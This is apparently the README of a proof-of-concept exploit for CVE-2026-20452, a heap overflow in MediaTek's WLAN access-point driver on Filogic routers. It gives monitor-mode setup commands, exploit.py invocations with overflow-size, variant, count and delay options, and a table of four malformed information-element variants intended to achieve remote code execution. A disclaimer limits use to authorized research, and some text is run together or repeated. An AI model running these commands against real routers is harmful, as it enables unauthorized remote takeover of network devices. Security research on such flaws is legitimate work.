
CVE-2026-20452用の概念実証エクスプロイト、MediaTek WLAN APドライバーにおけるヒープベースのバッファオーバーフロー。scapyを使用して細工されたWi-Fi管理フレームを送信し、影響を受けるFilogicルーター上でリモートコード実行を引き起こします。
CVE-2026-20452 の概念実証エクスプロイト。MediaTek の WLAN アクセスポイントドライバーにおけるヒープベースのバッファオーバーフローです。
https://www.hunt-benito.com/blog/mediatek-wlan-heap-overflow-cve-2026-20452-filogic-router-rce/
pip install scapy)sudo airmon-ng check kill
sudo airmon-ng start wlan0
# インターフェースが wlan0mon になります
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66
sudo python exploit.py --interface wlan0mon --bssid AA:BB:CC:DD:EE:FF --attacker 11:22:33:44:55:66 \
--overflow-size 1024 --variant 2 --count 50 --delay 0.05
このツールは、許可されたセキュリティ研究および教育目的のみに提供されています。Wi-Fi 周波数での送信には、お住まいの地域での法的許可が必要な場合があります。自分が所有していない、または明示的なテスト許可を得ていないシステムに対する不正使用は違法です。著者は一切の責任を負わず、このツールの誤用または損害について責任を負いません。
| Variant | IE Type | 説明 |
|---|
| 0 | Vendor Specific (221) | OUI 00:50:43 の単一の特大 IE |
| 1 | Chained Vendor IEs | 隣接するヒープオブジェクトを破壊する複数の小さな IE |
| 2 | HT Capabilities (45) | 特大の HT Capabilities IE |
| 3 | Extended Capabilities (127) | 特大の Extended Capabilities IE |